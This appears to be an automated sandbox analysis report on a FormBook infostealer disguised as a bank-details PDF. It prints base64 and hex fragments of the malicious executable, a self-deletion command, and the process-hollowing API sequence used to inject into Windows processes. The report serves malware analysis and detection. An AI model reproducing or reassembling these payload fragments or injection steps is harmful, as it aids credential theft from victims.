                                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJ/rwtQAAAAAAAAAAOAADiELAVAAAPYAAAAGAAAAAAAA7hQBAAAgAAAAIAEAAABAAAAgAAAAAgA
                                                2022-01-26 10:57:46 UTC234INData Raw: 55 41 41 41 41 34 56 2f 48 2f 2f 77 41 43 4b 4c 59 41 41 41 5a 79 78 51 41 41 63 47 39 59 41 41 41 4b 49 45 38 41 41 41 41 34 50 50 48 2f 2f 77 41 43 4b 4c 73 41 41 41 5a 79 67 51 45 41 63 43 69 38 41 41 41 47 49 42 6b 41 41 41 41 6f 71 77 41 41 42 6a 6b 63 38 66 2f 2f 4a 6a 67 53 38 66 2f 2f 41 41 49 6f 78 51 41 41 42 68 39 41 48 30 42 7a 55 77 41 41 43 6d 39 55 41 41 41 4b 49 41 45 41 41 41 41 6f 71 67 41 41 42 6a 72 79 38 50 2f 2f 4a 6a 6a 6f 38 50 2f 2f 41 41 49 6f 7a 67 41 41 42 69 43 41 41 41 41 41 49 49 41 41 41 41 42 7a 55 77 41 41 43 6d 39 55 41 41 41 4b 49 41 73 41 41 41 44 2b 44 67 41 41 4f 4c 2f 77 2f 2f 38 41 41 6e 4e 66 41 41 41 4b 4b 4b 34 41 41 41 59 34 4a 50 33 2f 2f 77 41 43 4b 4d 6b 41 41 41 59 66 57 42 39 59 63 31 4d 41 41 41 6f 6f 76
                                                Data Ascii: UAAAA4V/H//wACKLYAAAZyxQAAcG9YAAAKIE8AAAA4PPH//wACKLsAAAZygQEAcCi8AAAGIBkAAAAoqwAABjkc8f//JjgS8f//AAIoxQAABh9AH0BzUwAACm9UAAAKIAEAAAAoqgAABjry8P//Jjjo8P//AAIozgAABiCAAAAAIIAAAABzUwAACm9UAAAKIAsAAAD+DgAAOL/w//8AAnNfAAAKKK4AAAY4JP3//wACKMkAAAYfWB9Yc1MAAAoov
                                                2022-01-26 10:57:46 UTC250INData Raw: 41 41 4b 51 51 41 41 47 45 41 46 51 43 41 41 41 73 42 41 41 42 48 42 41 41 41 59 51 41 5a 41 49 41 41 41 51 41 41 41 46 73 45 41 51 42 6c 41 43 49 41 67 41 41 41 41 51 41 41 65 77 51 41 41 46 55 41 4e 77 44 57 41 42 4d 42 41 41 43 61 42 41 41 41 59 51 42 46 41 4e 59 41 45 77 45 41 41 4c 59 45 41 41 42 68 41 45 55 41 31 67 41 54 41 51 41 41 30 77 51 41 41 47 45 41 52 51 44 57 41 42 4d 42 41 41 44 77 42 41 41 41 59 51 42 46 41 4e 59 41 45 77 45 41 41 41 30 46 41 41 42 68 41 45 55 41 31 67 41 54 41 51 41 41 4b 67 55 41 41 47 45 41 52 51 44 57 41 42 4d 42 41 41 42 48 42 51 41 41 59 51 42 46 41 4e 59 41 45 77 45 41 41 47 51 46 41 41 42 68 41 45 55 41 31 67 41 41 41 41 41 41 67 51 55 41 41 46 55 41 52 51 44 57 41 41 41 41 45 41 43 77 42 63 4d 46 56 51 42 46 41
                                                Data Ascii: AAKQQAAGEAFQCAAAsBAABHBAAAYQAZAIAAAQAAAFsEAQBlACIAgAAAAQAAewQAAFUANwDWABMBAACaBAAAYQBFANYAEwEAALYEAABhAEUA1gATAQAA0wQAAGEARQDWABMBAADwBAAAYQBFANYAEwEAAA0FAABhAEUA1gATAQAAKgUAAGEARQDWABMBAABHBQAAYQBFANYAEwEAAGQFAABhAEUA1gAAAAAAgQUAAFUARQDWAAAAEACwBcMFVQBFA
                                                2022-01-26 10:57:46 UTC266INData Raw: 41 41 41 41 41 41 41 42 73 42 36 68 59 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 67 44 50 4a 51 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 44 45 30 41 41 43 34 41 41 41 41 41 51 41 41 41 47 59 30 41 41 42 77 41 51 41 41 41 51 41 41 41 4a 38 30 41 41 41 6f 41 67 41 41 41 51 41 41 41 4e 41 30 41 41 41 46 41 41 51 41 42 67 41 45 41 41 73 41 43 67 41 4d 41 41 6f 41 44 51 41 4b 41 41 34 41 43 67 41 50 41 41 6f 41 45 41 41 4b 41 42 45 41 43 67 41 53 41 41 6f 41 45 77 41 4b 41 42 51 41 43 67 41 56 41 41 6f 41 46 67 41 4b 41 42 63 41 43 67 41 61 41 42 6b 41 47 77 41 5a 41 42 77 41 47 51 41 64 41 42 6b 41 48 67 41 5a 41 42 38 41 47 51 41 67 41 42 6b 41 49 51 41 5a 41 43 51 41 49 77 41 6d 41 43 55 41 4a 77 41 6c 41 43 67 41 4a 77 41 70 41
                                                Data Ascii: AAAAAAABsB6hYAAAAABAAAAAAAAAAAAAAACgDPJQAAAAAAAAAAAQAAADE0AAC4AAAAAQAAAGY0AABwAQAAAQAAAJ80AAAoAgAAAQAAANA0AAAFAAQABgAEAAsACgAMAAoADQAKAA4ACgAPAAoAEAAKABEACgASAAoAEwAKABQACgAVAAoAFgAKABcACgAaABkAGwAZABwAGQAdABkAHgAZAB8AGQAgABkAIQAZACQAIwAmACUAJwAlACgAJwApA
                                                2022-01-26 10:57:46 UTC282INData Raw: 5a 56 57 6c 49 77 62 32 46 4b 4d 58 6c 77 63 44 55 41 61 31 6c 72 55 57 4e 47 56 6c 70 30 65 46 5a 54 51 33 46 55 4d 55 4e 4f 64 77 42 44 63 6d 56 68 64 47 56 45 5a 57 4e 79 65 58 42 30 62 33 49 41 59 33 45 7a 63 32 4a 61 56 6b 4e 71 63 48 59 79 64 6c 42 48 61 44 56 6d 53 77 42 58 63 6d 6c 30 5a 51 42 76 4f 47 74 70 54 7a 42 57 61 57 70 56 54 56 42 69 4d 31 52 4e 62 58 63 33 41 46 56 79 5a 57 68 51 64 6c 59 77 62 58 45 79 59 32 4a 54 56 31 64 5a 55 32 67 41 63 6b 46 50 55 33 4a 75 56 6a 52 47 4e 7a 6c 55 5a 55 31 42 53 7a 56 6b 56 41 42 79 61 57 5a 49 61 47 78 57 64 31 52 46 4d 58 4a 4a 4e 48 68 53 4f 47 70 59 41 46 59 32 61 57 74 6e 59 31 5a 4a 55 6c 6f 31 61 6d 52 72 4e 47 4e 72 51 6d 6f 41 52 7a 6c 7a 61 31 42 45 5a 32 4e 59 59 67 42 55 62 30 4a 68 63
                                                Data Ascii: ZVWlIwb2FKMXlwcDUAa1lrUWNGVlp0eFZTQ3FUMUNOdwBDcmVhdGVEZWNyeXB0b3IAY3Ezc2JaVkNqcHYydlBHaDVmSwBXcml0ZQBvOGtpTzBWaWpVTVBiM1RNbXc3AFVyZWhQdlYwbXEyY2JTV1dZU2gAckFPU3JuVjRGNzlUZU1BSzVkVAByaWZIaGxWd1RFMXJJNHhSOGpYAFY2aWtnY1ZJUlo1amRrNGNrQmoARzlza1BEZ2NYYgBUb0Jhc
                                                2022-01-26 10:57:46 UTC298INData Raw: 52 54 5a 58 42 68 63 6d 46 30 62 33 49 4d 62 56 39 70 63 31 4a 6c 59 57 52 50 62 6d 78 35 44 57 31 66 59 33 56 73 64 48 56 79 5a 55 35 68 62 57 55 52 59 33 56 7a 64 47 39 74 51 33 56 73 64 48 56 79 5a 55 35 68 62 57 55 4c 62 56 39 75 52 47 46 30 59 55 6c 30 5a 57 30 52 62 56 39 31 63 32 56 56 63 32 56 79 54 33 5a 6c 63 6e 4a 70 5a 47 55 4e 62 56 39 33 61 57 34 7a 4d 6b 78 68 62 6d 64 4a 52 41 45 41 41 51 45 41 41 41 41 42 43 41 45 49 42 67 59 41 41 41 41 42 4c 41 45 4a 42 51 41 41 41 41 6b 46 41 41 41 41 41 41 41 41 41 41 42 2f 41 41 41 41 42 41 51 41 41 41 41 6c 55 33 6c 7a 64 47 56 74 4c 6b 64 73 62 32 4a 68 62 47 6c 36 59 58 52 70 62 32 34 75 54 6e 56 74 59 6d 56 79 52 6d 39 79 62 57 46 30 53 57 35 6d 62 79 49 41 41 41 41 51 62 6e 56 74 59 6d 56 79 52
                                                Data Ascii: RTZXBhcmF0b3IMbV9pc1JlYWRPbmx5DW1fY3VsdHVyZU5hbWURY3VzdG9tQ3VsdHVyZU5hbWULbV9uRGF0YUl0ZW0RbV91c2VVc2VyT3ZlcnJpZGUNbV93aW4zMkxhbmdJRAEAAQEAAAABCAEIBgYAAAABLAEJBQAAAAkFAAAAAAAAAAB/AAAABAQAAAAlU3lzdGVtLkdsb2JhbGl6YXRpb24uTnVtYmVyRm9ybWF0SW5mbyIAAAAQbnVtYmVyR


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:1
                                                Start time:11:57:41
                                                Start date:26/01/2022
                                                Path:C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe"
                                                Imagebase:0xcc0000
                                                File size:51400 bytes
                                                MD5 hash:A7F81ECD307166B18C038245A2005564
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:5
                                                Start time:11:57:47
                                                Start date:26/01/2022
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                Imagebase:0xd20000
                                                File size:55400 bytes
                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Target ID:6
                                                Start time:11:57:50
                                                Start date:26/01/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff662bf0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:15
                                                Start time:11:58:14
                                                Start date:26/01/2022
                                                Path:C:\Windows\SysWOW64\autofmt.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                Imagebase:0x40000
                                                File size:831488 bytes
                                                MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Target ID:16
                                                Start time:11:58:21
                                                Start date:26/01/2022
                                                Path:C:\Windows\SysWOW64\WWAHost.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                Imagebase:0x3f0000
                                                File size:829856 bytes
                                                MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Target ID:18
                                                Start time:11:58:27
                                                Start date:26/01/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                Imagebase:0x870000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:19
                                                Start time:11:58:28
                                                Start date:26/01/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff774ee0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:24.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:15
                                                  Total number of Limit Nodes:0

                                                  Executed Functions

                                                  Function 00007FFF301354CD Relevance: 1.7, APIs: 1, Instructions: 214injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.267203072.00007FFF30130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF30130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7fff30130000_BANK DETAILS-25012022-971332pdf.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: dbb6f4fb8ea23b46a6c765cc21acc92767a89dd3049630edb48292645d463f8a
                                                  • Instruction ID: 93eae8713d9c40a5f9f5b268d47cc5b18de7b0f661133129560edb46d64feecc
                                                  • Opcode Fuzzy Hash: dbb6f4fb8ea23b46a6c765cc21acc92767a89dd3049630edb48292645d463f8a
                                                  • Instruction Fuzzy Hash: 9D613770908A5D8FDB98DF58C885BE9BBF1FB69311F1082AAD04DE3255DB34A985CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFF3013582D Relevance: 1.7, APIs: 1, Instructions: 187memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 13 7fff3013582d-7fff3013597b VirtualAllocEx 18 7fff30135983-7fff301359db 13->18 19 7fff3013597d 13->19 19->18
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.267203072.00007FFF30130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF30130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7fff30130000_BANK DETAILS-25012022-971332pdf.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: afe797cfe05e56032c53a975cbb1b94e8bcd5a3378e4d122b6bd3eb9f689ebb8
                                                  • Instruction ID: 382f8f5e618d3ac43f0c8ea441da126ebb01e2e0dfccd9957905697cf51ed388
                                                  • Opcode Fuzzy Hash: afe797cfe05e56032c53a975cbb1b94e8bcd5a3378e4d122b6bd3eb9f689ebb8
                                                  • Instruction Fuzzy Hash: D351277090865D8FDF94EF58C844BE9BBF1FB69310F1082AAD04DE3251DB30A885CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFF3013518B Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.267203072.00007FFF30130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF30130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7fff30130000_BANK DETAILS-25012022-971332pdf.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 52a5f1bce7b3881bee9aadc16de6a3dac3ab9ed9cc61dbd6205fee0be60267cc
                                                  • Instruction ID: a899c90bbf453a89e00242269b5725348734d757648d43520a3f874d2dcb12f1
                                                  • Opcode Fuzzy Hash: 52a5f1bce7b3881bee9aadc16de6a3dac3ab9ed9cc61dbd6205fee0be60267cc
                                                  • Instruction Fuzzy Hash: 8951F570908A5C8FEB98EF98C849BEDBBF1FB58311F10826AD409E3255DB749585CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFF301359DD Relevance: 1.6, APIs: 1, Instructions: 140threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 33 7fff301359dd-7fff301359e9 34 7fff301359f4-7fff30135ac0 ResumeThread 33->34 35 7fff301359eb-7fff301359f3 33->35 40 7fff30135ac2 34->40 41 7fff30135ac8-7fff30135b12 34->41 35->34 40->41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.267203072.00007FFF30130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF30130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7fff30130000_BANK DETAILS-25012022-971332pdf.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: d050279e778eaecff6bce6afb1664d73b749161ac7e394e113dc2afe9fb32c4c
                                                  • Instruction ID: 33a3e7a0a7add6e97404ce0edae9b6cfb22926e9678d370489c0ab34fba20a5a
                                                  • Opcode Fuzzy Hash: d050279e778eaecff6bce6afb1664d73b749161ac7e394e113dc2afe9fb32c4c
                                                  • Instruction Fuzzy Hash: 42414874D0864D8FDF59EFA8D885AEDBBF0FB5A320F10416AD409E7252DB70A485CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFF30134E40 Relevance: 1.6, APIs: 1, Instructions: 124processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 44 7fff30134e40-7fff30134f50 CreateProcessA 49 7fff30134f52 44->49 50 7fff30134f58-7fff30134fa2 44->50 49->50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.267203072.00007FFF30130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF30130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7fff30130000_BANK DETAILS-25012022-971332pdf.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 94e77fde648401ffe91cd056134b5041eacfa062ba94fdab9cab302bbbcea7d0
                                                  • Instruction ID: 6cffa788e160df7ddf1d1ad5f8fb85e7f162a318421b9b3eef70b35c4cf3cda7
                                                  • Opcode Fuzzy Hash: 94e77fde648401ffe91cd056134b5041eacfa062ba94fdab9cab302bbbcea7d0
                                                  • Instruction Fuzzy Hash: 9F41A574518A8C8FEBB4EF18D894BE977E1FB69310F10412AD84DDB291DB74AA44CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:5.4%
                                                  Dynamic/Decrypted Code Coverage:2.8%
                                                  Signature Coverage:5.9%
                                                  Total number of Nodes:580
                                                  Total number of Limit Nodes:66
                                                  execution_graph 24962 41d490 24963 41d49b 24962->24963 24965 419bf0 24962->24965 24966 419c16 24965->24966 24977 408b60 24966->24977 24968 419c22 24976 419c69 24968->24976 24985 40d170 24968->24985 24970 419c37 24971 419c4c 24970->24971 25033 418930 24970->25033 24997 40a610 24971->24997 24974 419c5b 24975 418930 2 API calls 24974->24975 24975->24976 24976->24963 24978 408b6d 24977->24978 25036 408ab0 24977->25036 24980 408b74 24978->24980 25048 408a50 24978->25048 24980->24968 24986 40d19c 24985->24986 25459 40a010 24986->25459 24988 40d1ae 25463 40d080 24988->25463 24991 40d1e1 24994 40d1f2 24991->24994 24996 418710 2 API calls 24991->24996 24992 40d1c9 24993 40d1d4 24992->24993 24995 418710 2 API calls 24992->24995 24993->24970 24994->24970 24995->24993 24996->24994 24998 40a635 24997->24998 24999 40a010 LdrLoadDll 24998->24999 25000 40a68c 24999->25000 25482 409c90 25000->25482 25002 40a6b2 25032 40a903 25002->25032 25491 4133a0 25002->25491 25004 40a6f7 25004->25032 25494 4079d0 25004->25494 25006 40a73b 25006->25032 25501 418780 25006->25501 25010 40a791 25011 40a798 25010->25011 25513 418290 25010->25513 25012 41a0a0 2 API calls 25011->25012 25014 40a7a5 25012->25014 25014->24974 25016 40a7e2 25017 41a0a0 2 API calls 25016->25017 25018 40a7e9 25017->25018 25018->24974 25019 40a7f2 25020 40d200 3 API calls 25019->25020 25021 40a866 25020->25021 25021->25011 25022 40a871 25021->25022 25023 41a0a0 2 API calls 25022->25023 25024 40a895 25023->25024 25518 4182e0 25024->25518 25027 418290 2 API calls 25028 40a8d0 25027->25028 25028->25032 25523 4180a0 25028->25523 25031 418930 2 API calls 25031->25032 25032->24974 25034 4191e0 LdrLoadDll 25033->25034 25035 41894f ExitProcess 25034->25035 25035->24971 25037 408ac3 25036->25037 25087 416e50 LdrLoadDll 25036->25087 25067 416d00 25037->25067 25040 408ad6 25040->24978 25041 408acc 25041->25040 25070 419530 25041->25070 25043 408b13 25043->25040 25081 4088d0 25043->25081 25045 408b33 25088 408320 LdrLoadDll 25045->25088 25047 408b45 25047->24978 25432 419820 25048->25432 25051 419820 LdrLoadDll 25052 408a7b 25051->25052 25053 419820 LdrLoadDll 25052->25053 25054 408a91 25053->25054 25055 40cf70 25054->25055 25056 40cf89 25055->25056 25441 409e90 25056->25441 25058 40cf9c 25445 418460 25058->25445 25061 408b85 25061->24968 25063 40cfc2 25064 40cfed 25063->25064 25452 4184e0 25063->25452 25066 418710 2 API calls 25064->25066 25066->25061 25089 418880 25067->25089 25071 419549 25070->25071 25102 413a50 25071->25102 25073 419561 25074 41956a 25073->25074 25141 419370 25073->25141 25074->25043 25076 41957e 25076->25074 25159 418180 25076->25159 25084 4088ea 25081->25084 25410 406e20 25081->25410 25083 4088f1 25083->25045 25084->25083 25423 4070e0 25084->25423 25087->25037 25088->25047 25090 416d15 25089->25090 25092 4191e0 25089->25092 25090->25041 25093 4191f0 25092->25093 25094 419212 25092->25094 25096 413e50 25093->25096 25094->25090 25097 413e5e 25096->25097 25099 413e6a 25096->25099 25097->25099 25101 4142d0 LdrLoadDll 25097->25101 25099->25094 25100 413fbc 25100->25094 25101->25100 25103 413d85 25102->25103 25104 413a64 25102->25104 25103->25073 25104->25103 25167 417ed0 25104->25167 25107 413b90 25170 4185e0 25107->25170 25108 413b73 25227 4186e0 LdrLoadDll 25108->25227 25111 413bb7 25113 41a0a0 2 API calls 25111->25113 25112 413b7d 25112->25073 25115 413bc3 25113->25115 25114 413d49 25117 418710 2 API calls 25114->25117 25115->25112 25115->25114 25116 413d5f 25115->25116 25121 413c52 25115->25121 25236 413790 LdrLoadDll NtReadFile NtClose 25116->25236 25118 413d50 25117->25118 25118->25073 25120 413d72 25120->25073 25122 413cb9 25121->25122 25124 413c61 25121->25124 25122->25114 25123 413ccc 25122->25123 25229 418560 25123->25229 25126 413c66 25124->25126 25127 413c7a 25124->25127 25228 413650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 25126->25228 25130 413c97 25127->25130 25131 413c7f 25127->25131 25130->25118 25185 413410 25130->25185 25173 4136f0 25131->25173 25133 413c70 25133->25073 25135 413d2c 25233 418710 25135->25233 25136 413c8d 25136->25073 25138 413caf 25138->25073 25140 413d38 25140->25073 25142 41937a 